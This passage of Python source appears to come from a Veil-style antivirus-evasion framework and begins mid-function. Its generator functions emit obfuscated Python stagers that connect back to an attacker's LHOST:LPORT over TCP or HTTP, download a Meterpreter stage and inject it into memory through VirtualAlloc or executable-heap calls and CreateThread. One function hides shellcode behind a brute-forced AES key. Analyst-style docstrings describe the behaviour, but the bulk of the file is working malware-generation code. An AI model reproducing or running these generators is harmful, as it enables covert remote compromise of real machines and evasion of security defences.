        payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n"
    # Assuming heap injection for every other INJECT_METHOD value
    else:
        HeapVar = evasion_helpers.randomString()
        # HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) sized at twice the stage, HeapAlloc(HEAP_ZERO_MEMORY), copy, run
        payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'

    # download the meterpreter .dll and inject it
    payload_code += '\t' * num_tabs_required + "%s = ''\n" %(data2Name)
    payload_code += '\t' * num_tabs_required + "%s = %s(\"%s\", %s)\n" %(data2Name, downloadMethodName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    payload_code += '\t' * num_tabs_required + "%s(%s)\n" %(injectMethodName, data2Name)

    # Optional second layer: wrap the whole stub with the pyherion crypter.
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)

    self.payload_source_code = payload_code
    return
def generate(self) -> None:
    """Build the source of a Python reverse-TCP meterpreter stager.

    Reads the ``LHOST``, ``LPORT``, ``INJECT_METHOD`` and ``USE_PYHERION``
    entries of ``self.required_options``; writes ``self.payload_source_code``;
    returns None.

    Analyst notes (behaviour of the emitted stager, as written below):
      * it connects out to LHOST:LPORT, reads a 4-byte little-endian length
        and then that many bytes (the stage); LHOST/LPORT are literals in the
        artifact;
      * any exception in the download routine is swallowed (``except: return
        None``) and the injector then does nothing;
      * "virtual" uses PAGE_EXECUTE_READWRITE (0x40) memory + CreateThread;
        every other INJECT_METHOD value uses an executable heap.
      * NOTE(review): the "virtual" branch emits its lines without the
        ``'\\t' * num_tabs_required`` prefix that the heap branch and the
        sibling generators use, so its indentation only lines up when
        senecas_games() returns zero tabs — confirm against gamemaker.
    """
    # randomize all of the variable names used
    shellCodeName = evasion_helpers.randomString()
    socketName = evasion_helpers.randomString()
    getDataMethodName = evasion_helpers.randomString()
    fdBufName = evasion_helpers.randomString()
    rcvStringName = evasion_helpers.randomString()
    rcvCStringName = evasion_helpers.randomString()
    injectMethodName = evasion_helpers.randomString()
    tempShellcodeName = evasion_helpers.randomString()
    shellcodeBufName = evasion_helpers.randomString()
    fpName = evasion_helpers.randomString()
    tempCBuffer = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()

    payload_code = "import struct, socket, binascii, ctypes as " + randctypes + ", random, time\n"

    # How I'm tracking the number of nested tabs needed
    # to make the payload
    num_tabs_required = 0
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2

    # socket and shellcode variables that need to be kept global
    payload_code += '\t' * num_tabs_required + "%s, %s = None, None\n" % ( shellCodeName, socketName)

    # build the method that creates a socket, connects to the handler,
    # and downloads/patches the meterpreter .dll
    payload_code += '\t' * num_tabs_required + "def %s():\n" % ( getDataMethodName)
    payload_code += '\t' * num_tabs_required + "\ttry:\n"
    payload_code += '\t' * num_tabs_required + "\t\tglobal %s\n" % ( socketName)
    # build the socket and connect to the handler
    payload_code += '\t' * num_tabs_required + "\t\t%s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n" % ( socketName)
    payload_code += '\t' * num_tabs_required + "\t\t%s.connect(('%s', %s))\n" % ( socketName, self.required_options["LHOST"][0], self.required_options["LPORT"][0])
    # pack the underlying socket file descriptor into a c structure
    payload_code += '\t' * num_tabs_required + "\t\t%s = struct.pack('<i', %s.fileno())\n" % ( fdBufName, socketName)
    # unpack the length of the payload, received as a 4 byte array from the handler
    payload_code += '\t' * num_tabs_required + "\t\tl = struct.unpack('<i', %s.recv(4))[0]\n" % ( socketName)
    # buffer starts with one placeholder byte; the loop below appends the stage
    payload_code += '\t' * num_tabs_required + "\t\t%s = b\" \"\n" % ( rcvStringName)
    # receive ALL of the payload .dll data
    payload_code += '\t' * num_tabs_required + "\t\twhile len(%s) < l: %s += %s.recv(l)\n" % ( rcvStringName, rcvStringName, socketName)
    payload_code += '\t' * num_tabs_required + "\t\t" + rcvCStringName + " = " + randctypes + ".create_string_buffer(%s, len(%s))\n" % ( rcvStringName, rcvStringName)
    # prepend a little assembly magic to push the socket fd into the edi register
    payload_code += '\t' * num_tabs_required + "\t\t%s[0] = binascii.unhexlify('BF')\n" % ( rcvCStringName)
    # copy the socket fd in
    payload_code += '\t' * num_tabs_required + "\t\tfor i in range(4): %s[i+1] = %s[i]\n" % ( rcvCStringName, fdBufName)
    payload_code += '\t' * num_tabs_required + "\t\treturn %s\n" % ( rcvCStringName)
    # bare except: every failure becomes None and the injector is skipped
    payload_code += '\t' * num_tabs_required + "\texcept: return None\n"

    # build the method that injects the .dll into memory
    payload_code += '\t' * num_tabs_required + "def %s(%s):\n" % ( injectMethodName, tempShellcodeName)
    payload_code += '\t' * num_tabs_required + "\tif %s != None:\n" % ( tempShellcodeName)
    payload_code += '\t' * num_tabs_required + "\t\t%s = bytearray(%s)\n" % ( shellcodeBufName, tempShellcodeName)

    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # allocate enough virtual memory to stuff the .dll in (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE)
        payload_code += "\t\t" + fpName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + shellcodeBufName + "))," + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
        # expose the bytearray as a ctypes char array (no VirtualLock in this variant)
        payload_code += "\t\t" + tempCBuffer + " = (" + randctypes + ".c_char * len(" + shellcodeBufName + ")).from_buffer(" + shellcodeBufName + ")\n"
        # copy the .dll into the allocated memory
        payload_code += "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + fpName + "), " + tempCBuffer + ", " + randctypes + ".c_int(len(" + shellcodeBufName + ")))\n"
        # kick the thread off to execute the .dll
        payload_code += "\t\tht = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + fpName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
        # wait for the .dll execution to finish
        payload_code += "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(ht)," + randctypes + ".c_int(-1))\n"
    # Assume HEAP Injection for every other INJECT_METHOD value
    else:
        HeapVar = evasion_helpers.randomString()
        handleName = evasion_helpers.randomString()
        # HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) sized at twice the stage, HeapAlloc(HEAP_ZERO_MEMORY), copy, run
        payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + shellcodeBufName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + fpName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + shellcodeBufName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + tempCBuffer + ' = (' + randctypes + '.c_char * len(' + shellcodeBufName + ')).from_buffer(' + shellcodeBufName + ')\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + fpName + '),' + tempCBuffer + ',' + randctypes + '.c_int(len(' + shellcodeBufName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + fpName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'

    # download the stager
    payload_code += '\t' * num_tabs_required + "%s = %s()\n" % ( shellCodeName, getDataMethodName)
    # inject what we grabbed
    payload_code += '\t' * num_tabs_required + "%s(%s)\n" % ( injectMethodName, shellCodeName)

    # Optional second layer: wrap the whole stub with the pyherion crypter.
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)

    self.payload_source_code = payload_code
    return
def generate(self) -> None:
    """Build the source of a Python stub that recovers a partially-withheld AES key and then runs embedded shellcode.

    Reads ``self.cli_shellcode`` / ``self.shellcode`` / ``self.cli_opts`` and the
    ``INJECT_METHOD`` and ``USE_PYHERION`` entries of ``self.required_options``.
    Writes ``self.payload_type`` and ``self.payload_source_code``; returns None.

    Analyst notes (what the emitted artifact contains):
      * encryption.constrained_aes() returns the ciphertext, a key prefix
        (``constrained_key``) and the full key; the stub embeds the prefix, a
        known-plaintext string and that string's ciphertext, then loops over
        ``range(1000000, 10000000)`` appending each 7-digit number to the prefix
        and testing the candidate with AES-ECB against the known plaintext;
      * because prefix, known plaintext and both ciphertexts are all literals
        in the artifact, the same 9,000,000-candidate search recovers the
        shellcode offline — the withheld digits are a delay, not a secret;
      * the stub needs ``Crypto.Cipher`` (PyCrypto) at run time and also emits
        ``import os``, which the generated code does not appear to use;
      * after a key match the shellcode is run from memory committed
        read/write (0x04) and flipped to execute (0x20), or from an executable
        heap (HeapCreate 0x00040000) in the heap variant;
      * the "virtual" branch wraps its decrypt in ``try/except: pass`` and
        ends without a trailing newline; the "heap" branch has no try/except
        and, unlike the "virtual" branch, interpolates the generator-side
        ``encryption_key`` name into ``AES.new(...)`` rather than the
        ``secret_key`` loop variable — the two branches do not emit
        equivalent stubs;
      * if INJECT_METHOD is neither "virtual" nor "heap" no stub body is
        emitted, only the senecas_games() prefix.
    """
    # Generate the variable names
    randctypes = evasion_helpers.randomString()
    ShellcodeVariableName = evasion_helpers.randomString()
    rand_ptr = evasion_helpers.randomString()
    rand_ht = evasion_helpers.randomString()
    known_plaintext_string = evasion_helpers.randomString()
    key_guess = evasion_helpers.randomString()
    secret_key = evasion_helpers.randomString()
    small_constrained_key_variable = evasion_helpers.randomString()
    decoded_ciphertext = evasion_helpers.randomString()
    decoded_known = evasion_helpers.randomString()
    decoded_shellcode = evasion_helpers.randomString()
    RandCipherObject = evasion_helpers.randomString()
    RandPadding = evasion_helpers.randomString()
    rand_virtual_protect = evasion_helpers.randomString()

    # Generate the shellcode: either from the configured shellcode module, or
    # from the raw string passed on the command line (no escape-decoding here,
    # unlike the sibling generators).
    if not self.cli_shellcode:
        Shellcode = self.shellcode.generate(self.cli_opts)
        if self.shellcode.msfvenompayload:
            self.payload_type = self.shellcode.msfvenompayload
        elif self.shellcode.payload_choice:
            self.payload_type = self.shellcode.payload_choice
            self.shellcode.payload_choice = ''
        # assume custom shellcode
        else:
            self.payload_type = 'custom'
    else:
        Shellcode = self.cli_shellcode

    # senecas_games() supplies the (optional) sandbox-check prefix and tells us
    # how deeply the rest of the stub must be indented under it.
    payload_code, num_tabs_required = gamemaker.senecas_games(self)

    # encrypt the shellcode and get our randomized key
    encoded_ciphertext, constrained_key, encryption_key = encryption.constrained_aes(Shellcode)
    encoded_ciphertext = encoded_ciphertext.decode('ascii')

    # Use the secret we received earlier to encrypt our known plaintext string
    encrypted_plaintext_string = encryption.known_plaintext(encryption_key, known_plaintext_string)
    encrypted_plaintext_string = encrypted_plaintext_string.decode('ascii')

    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # Create Payload code
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + 'import os\n'
        payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n'
        payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n'
        # key-recovery loop: prefix + each 7-digit suffix, checked against the known plaintext
        payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n'
        payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \"" + constrained_key + '\" + str(' + key_guess + ')\n'
        payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(' + secret_key + ', AES.MODE_ECB)\n'
        payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n'
        payload_code += '\t' * num_tabs_required + '\ttry:\n'
        payload_code += '\t' * num_tabs_required + '\t\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n'
        payload_code += '\t' * num_tabs_required + '\t\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n'
        payload_code += '\t' * num_tabs_required + '\t\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
        payload_code += '\t' * num_tabs_required + '\t\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n'
        # VirtualAlloc(MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE) -> copy -> VirtualProtect(PAGE_EXECUTE_READ) -> CreateThread
        payload_code += '\t' * num_tabs_required + '\t\t\t' + rand_ptr + ' = ' + randctypes + '.windll.kernel32.VirtualAlloc(' + randctypes + '.c_int(0),' + randctypes + '.c_int(len('+ ShellcodeVariableName +')),' + randctypes + '.c_int(0x3000),' + randctypes + '.c_int(0x04))\n'
        payload_code += '\t' * num_tabs_required + '\t\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + '\t\t\t' + rand_virtual_protect + ' = ' + randctypes + '.windll.kernel32.VirtualProtect(' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')),' + randctypes + '.c_int(0x20),' + randctypes + '.byref(' + randctypes + '.c_uint32(0)))\n'
        payload_code += '\t' * num_tabs_required + '\t\t\t' + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + '\t\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'
        # wrong-key candidates raise on decode and are silently skipped
        payload_code += '\t' * num_tabs_required + '\texcept:\n'
        # NOTE(review): no trailing '\n' on this last emitted line.
        payload_code += '\t' * num_tabs_required + '\t\tpass'
    elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
        HeapVar = evasion_helpers.randomString()
        payload_code += '\t' * num_tabs_required + 'import ctypes as ' + randctypes + '\n'
        payload_code += '\t' * num_tabs_required + 'from Crypto.Cipher import AES\n'
        payload_code += '\t' * num_tabs_required + 'import base64\n'
        payload_code += '\t' * num_tabs_required + 'import os\n'
        payload_code += '\t' * num_tabs_required + small_constrained_key_variable + ' = \'' + constrained_key + '\'\n'
        payload_code += '\t' * num_tabs_required + RandPadding + ' = \'*\'\n'
        payload_code += '\t' * num_tabs_required + 'for ' + key_guess + ' in range(1000000, 10000000):\n'
        payload_code += '\t' * num_tabs_required + '\t' + secret_key + " = \'" + constrained_key + '\' + str(' + key_guess + ')\n'
        # NOTE(review): this branch interpolates the generator-side `encryption_key`
        # value here, where the "virtual" branch uses the `secret_key` loop variable.
        payload_code += '\t' * num_tabs_required + '\t' + RandCipherObject + ' = AES.new(' + encryption_key + ', AES.MODE_ECB)\n'
        payload_code += '\t' * num_tabs_required + '\t' + decoded_ciphertext + ' = base64.b64decode(\'' + encrypted_plaintext_string + '\')\n'
        # no try/except around the decode in this branch
        payload_code += '\t' * num_tabs_required + '\t' + decoded_known + ' = ' + RandCipherObject + '.decrypt(' + decoded_ciphertext + ').decode(\'ascii\')\n'
        payload_code += '\t' * num_tabs_required + '\t' + 'if ' + decoded_known + '.rstrip(\'*\') == \'' + known_plaintext_string + '\':\n'
        payload_code += '\t' * num_tabs_required + '\t\t' + decoded_shellcode + ' = base64.b64decode(\'' + encoded_ciphertext + '\')\n'
        payload_code += '\t' * num_tabs_required + '\t\t' + ShellcodeVariableName + ' = ' + RandCipherObject + '.decrypt(' + decoded_shellcode + ')\n'
        # HeapCreate(HEAP_CREATE_ENABLE_EXECUTE) sized at twice the shellcode, HeapAlloc(HEAP_ZERO_MEMORY), copy, run
        payload_code += '\t' * num_tabs_required + '\t\t' + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + ShellcodeVariableName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + '\t\t' + rand_ptr + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + rand_ptr + '),' + ShellcodeVariableName + ',' + randctypes + '.c_int(len(' + ShellcodeVariableName + ')))\n'
        payload_code += '\t' * num_tabs_required + '\t\t' + rand_ht + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + rand_ptr + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + '\t\t' + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + rand_ht + '),' + randctypes + '.c_int(-1))\n'

    # Optional second layer: wrap the whole stub with the pyherion crypter.
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)

    self.payload_source_code = payload_code
    return
def generate(self) -> None:
    """Build the Python source of a reverse-HTTP stager and store it on self.

    The emitted stub (a) derives a check-in URI whose 8-bit character sum is
    92, (b) fetches ``http://LHOST:LPORT/<uri>`` through a proxy-bypassing
    opener with a fixed User-Agent, and (c) hands the response body to a
    ctypes-based in-memory injection routine (``VirtualAlloc`` or
    ``HeapCreate`` path, selected by ``INJECT_METHOD``).  The result is placed
    in ``self.payload_source_code``; nothing is returned.

    Reads ``self.required_options`` keys ``INJECT_METHOD``, ``LHOST``,
    ``LPORT`` and ``USE_PYHERION``.  Relies on module-level helpers
    ``evasion_helpers.randomString``, ``gamemaker.senecas_games`` and
    ``encryption.pyherion`` whose definitions are not visible here.

    Every identifier in the generated stub is a fresh random string, so the
    text differs per run; the behavioural artifacts listed above (fixed
    User-Agent, checksum-92 URI, direct opener, and the
    ``kernel32`` alloc -> ``RtlMoveMemory`` -> ``CreateThread`` ->
    ``WaitForSingleObject`` call chain) do not vary.
    """
    # Randomised identifiers for every name the emitted stub defines or uses.
    sumMethodName = evasion_helpers.randomString()
    checkinMethodName = evasion_helpers.randomString()
    randLettersName = evasion_helpers.randomString()
    randLetterSubName = evasion_helpers.randomString()
    randBaseName = evasion_helpers.randomString()
    downloadMethodName = evasion_helpers.randomString()
    hostName = evasion_helpers.randomString()
    portName = evasion_helpers.randomString()
    requestName = evasion_helpers.randomString()
    tName = evasion_helpers.randomString()
    injectMethodName = evasion_helpers.randomString()
    dataName = evasion_helpers.randomString()
    byteArrayName = evasion_helpers.randomString()
    ptrName = evasion_helpers.randomString()
    bufName = evasion_helpers.randomString()
    handleName = evasion_helpers.randomString()
    data2Name = evasion_helpers.randomString()
    proxy_var = evasion_helpers.randomString()
    opener_var = evasion_helpers.randomString()
    randctypes = evasion_helpers.randomString()
    # The stub's import line; only ctypes gets a randomised alias.
    payload_code = "import urllib.request, string, random, ctypes as " + randctypes + "\n"
    # How I'm tracking the number of nested tabs needed
    # to make the payload
    # NOTE: this initial value is dead -- the unpacking two lines down
    # overwrites it with whatever senecas_games returns.
    num_tabs_required = 0
    # senecas_games supplies a source prefix and the tab depth the rest of
    # the stub must be nested at (its contents are not visible here).
    payload_code2, num_tabs_required = gamemaker.senecas_games(self)
    payload_code = payload_code + payload_code2
    # helper method that returns the sum of all ord values in a string % 0x100
    payload_code += '\t' * num_tabs_required + "def " + sumMethodName + "(s): return sum([ord(ch) for ch in s]) % 0x100\n"
    # method that generates a new checksum value for checkin to the meterpreter handler
    # Up to 64 attempts: a random 3-char base plus one more char from a
    # shuffled alphabet until the 8-bit sum equals 92.  If no attempt
    # succeeds the emitted function falls off the end and returns None.
    payload_code += '\t' * num_tabs_required + "def " + checkinMethodName + "():\n\tfor x in range(64):\n"
    payload_code += '\t' * num_tabs_required + "\t\t" + randBaseName + " = ''.join(random.sample(string.ascii_letters + string.digits,3))\n"
    payload_code += '\t' * num_tabs_required + "\t\t" + randLettersName + " = ''.join(sorted(list(string.ascii_letters+string.digits), key=lambda *args: random.random()))\n"
    payload_code += '\t' * num_tabs_required + "\t\tfor " + randLetterSubName + " in " + randLettersName + ":\n"
    payload_code += '\t' * num_tabs_required + "\t\t\tif " + sumMethodName + "(" + randBaseName + " + " + randLetterSubName + ") == 92: return " + randBaseName + " + " + randLetterSubName + "\n"
    # method that connects to a host/port over http and downloads the hosted data
    # ProxyHandler({}) installed globally: the stub ignores any system proxy
    # and connects directly, a stable network-level characteristic.
    payload_code += '\t' * num_tabs_required + "def " + downloadMethodName + "(" + hostName + ", " + portName + "):\n"
    payload_code += '\t' * num_tabs_required + "\t" + proxy_var + " = urllib.request.ProxyHandler({})\n"
    payload_code += '\t' * num_tabs_required + "\t" + opener_var + " = urllib.request.build_opener(" + proxy_var + ")\n"
    payload_code += '\t' * num_tabs_required + "\turllib.request.install_opener(" + opener_var + ")\n"
    # Plain http, fixed User-Agent literal: both are constant across every
    # generated stub regardless of identifier randomisation.
    payload_code += '\t' * num_tabs_required + "\t" + requestName + " = urllib.request.Request(\"http://\" + " + hostName + " + \":\" + str(" + portName + ") + \"/\" + " + checkinMethodName + "(), None, {'User-Agent' : 'Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)'})\n"
    payload_code += '\t' * num_tabs_required + "\ttry:\n"
    payload_code += '\t' * num_tabs_required + "\t\t" + tName + " = urllib.request.urlopen(" + requestName + ")\n"
    payload_code += '\t' * num_tabs_required + "\t\ttry:\n"
    # Body is accepted only when Content-Length exceeds 100000; a missing or
    # non-integer header hits the bare except below and is read anyway.
    payload_code += '\t' * num_tabs_required + "\t\t\tif int(" + tName + ".info()[\"Content-Length\"]) > 100000: return " + tName + ".read()\n"
    payload_code += '\t' * num_tabs_required + "\t\t\telse: return ''\n"
    payload_code += '\t' * num_tabs_required + "\t\texcept: return " + tName + ".read()\n"
    # Connection failures are swallowed; the caller then sees '' and skips injection.
    payload_code += '\t' * num_tabs_required + "\texcept urllib.request.URLError:\n"
    payload_code += '\t' * num_tabs_required + "\t\treturn ''\n"
    # method to inject a reflective .dll into memory
    payload_code += '\t' * num_tabs_required + "def " + injectMethodName + "(" + dataName + "):\n"
    payload_code += '\t' * num_tabs_required + "\tif " + dataName + " != \"\":\n"
    payload_code += '\t' * num_tabs_required + "\t\t" + byteArrayName + " = bytearray(" + dataName + ")\n"
    # Only the literal "virtual" selects the VirtualAlloc path; anything
    # else (including typos) falls through to the heap path below.
    if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
        # VirtualAlloc with MEM_COMMIT|MEM_RESERVE (0x3000) and
        # PAGE_EXECUTE_READWRITE (0x40), then copy and run on a new thread.
        payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + " = " + randctypes + ".windll.kernel32.VirtualAlloc(" + randctypes + ".c_int(0)," + randctypes + ".c_int(len(" + byteArrayName + ")), " + randctypes + ".c_int(0x3000)," + randctypes + ".c_int(0x40))\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + bufName + " = (" + randctypes + ".c_char * len(" + byteArrayName + ")).from_buffer(" + byteArrayName + ")\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.RtlMoveMemory(" + randctypes + ".c_int(" + ptrName + ")," + bufName + ", " + randctypes + ".c_int(len(" + byteArrayName + ")))\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + handleName + " = " + randctypes + ".windll.kernel32.CreateThread(" + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".c_int(" + ptrName + ")," + randctypes + ".c_int(0)," + randctypes + ".c_int(0)," + randctypes + ".pointer(" + randctypes + ".c_int(0)))\n"
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + ".windll.kernel32.WaitForSingleObject(" + randctypes + ".c_int(" + handleName + ")," + randctypes + ".c_int(-1))\n"
    # Assuming heap injection
    else:
        HeapVar = evasion_helpers.randomString()
        # HeapCreate with HEAP_CREATE_ENABLE_EXECUTE (0x00040000) sized to
        # twice the body; HeapAlloc with HEAP_ZERO_MEMORY (0x00000008).
        payload_code += '\t' * num_tabs_required + "\t\t" + HeapVar + ' = ' + randctypes + '.windll.kernel32.HeapCreate(' + randctypes + '.c_int(0x00040000),' + randctypes + '.c_int(len(' + byteArrayName + ') * 2),' + randctypes + '.c_int(0))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + ptrName + ' = ' + randctypes + '.windll.kernel32.HeapAlloc(' + randctypes + '.c_int(' + HeapVar + '),' + randctypes + '.c_int(0x00000008),' + randctypes + '.c_int(len( ' + byteArrayName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + bufName + ' = (' + randctypes + '.c_char * len(' + byteArrayName + ')).from_buffer(' + byteArrayName + ')\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.RtlMoveMemory(' + randctypes + '.c_int(' + ptrName + '),' + bufName + ',' + randctypes + '.c_int(len(' + byteArrayName + ')))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + handleName + ' = ' + randctypes + '.windll.kernel32.CreateThread(' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.c_int(' + ptrName + '),' + randctypes + '.c_int(0),' + randctypes + '.c_int(0),' + randctypes + '.pointer(' + randctypes + '.c_int(0)))\n'
        payload_code += '\t' * num_tabs_required + "\t\t" + randctypes + '.windll.kernel32.WaitForSingleObject(' + randctypes + '.c_int(' + handleName + '),' + randctypes + '.c_int(-1))\n'
    # download the metpreter .dll and inject it
    # The '' initialisation is immediately overwritten by the download call.
    payload_code += '\t' * num_tabs_required + data2Name + " = ''\n"
    # NOTE(review): LHOST/LPORT are spliced into generated source unescaped;
    # a value containing a quote or newline yields a syntactically different
    # stub -- validate these options upstream.
    payload_code += '\t' * num_tabs_required + data2Name + " = " + downloadMethodName + "(\"" + self.required_options["LHOST"][0] + "\", " + str(self.required_options["LPORT"][0]) + ")\n"
    payload_code += '\t' * num_tabs_required + injectMethodName + "(" + data2Name + ")\n"
    # Optional post-processing of the whole source; pyherion is presumably a
    # further obfuscation layer (not visible here).
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        payload_code = encryption.pyherion(payload_code)
    self.payload_source_code = payload_code
    return